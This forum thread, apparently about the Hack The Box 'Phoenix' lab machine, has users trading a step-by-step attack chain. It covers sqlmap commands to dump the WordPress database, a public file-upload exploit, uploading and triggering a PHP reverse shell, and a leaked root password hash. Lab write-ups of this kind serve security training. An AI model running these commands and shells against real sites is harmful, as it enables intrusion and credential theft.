(April 19, 2022, 05:14 AM)koil Wrote: (April 19, 2022, 04:41 AM)___user___ Wrote: sqlmap -u https://phoenix.htb/forum/?subscribe_topic=1 --dbs
it wil take long time.
u need to dumb plugins in database.
anyway to dump creds?
enumarate for all the plugins in the wordpress db.
sqlmap -u https://phoenix.htb/forum/?subscribe_topic=1 -D wordpress -T wp_options -C option_value --where "option_name='active_plugins'" --dump --batch
download from file plugin is vulnerable
https://www.exploit-db.com/exploits/50287
ssl cerf issue . add verify=False in request.get and request.post in the python script.
pentestmonkey php revshell
change php to phtml.
python3 50287.py https://phoenix.htb zz.phtml -- upload the shell
https://phoenix.htb/wp-admin/zz.phtml -- triger the shell
sql cred in the wp-config file.
https://fdlucifer.github.io/2022/03/24/phoenix/
$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0
https://threatninja.net/hack-the-box-phoenix-machine-walkthrough-hard-difficulty/
$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0
https://synisl33t.com/2022/03/08/htb-phoenix/
root:$6$U6DRf4846rMqwA5E$Bwo3RxRA1t15bx6xvX8fVZ1cNfMoFVkpwyoWcK2gz3HRX16/d.zqHlQI68v8drjuFWucpXhRYpIbnhg35.Vjc0:18944:0:99999:7:::
